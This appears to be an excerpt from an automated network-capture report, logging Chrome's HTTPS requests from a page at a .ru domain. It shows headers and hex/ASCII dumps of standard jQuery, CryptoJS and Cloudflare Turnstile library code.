                                                            2025-01-06 15:53:47 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.449756104.17.24.144433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:47 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                            Host: cdnjs.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://gimd.lamantatio.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:47 UTC959INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:47 GMT
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: public, max-age=30672000
                                                            ETag: W/"61182885-40eb"
                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                            cf-cdnjs-via: cfworker/kv
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Timing-Allow-Origin: *
                                                            X-Content-Type-Options: nosniff
                                                            CF-Cache-Status: HIT
                                                            Age: 1044575
                                                            Expires: Sat, 27 Dec 2025 15:53:47 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPB%2BIemZ6HscFNiFNPJ7HZn267t0L0wK3nqTn7Qsl1vuwwfc3iVUu9%2B4qvRrjTR%2FVWLE0VKWSIaoLCGG02ZLB2lPjiuxRgbSbEh6igUyIBkDRQO4PW5fEZ3mws7uK4fdUrG6EdpE"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=15780000
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce209e98d8c05-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:47 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                            Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                            Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                            Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                            Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                            Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                            Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                            Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                            Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                            Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                            Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.449759104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:48 UTC649OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://gimd.lamantatio.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:48 UTC471INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:48 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47521
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce20dae5a4301-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:48 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
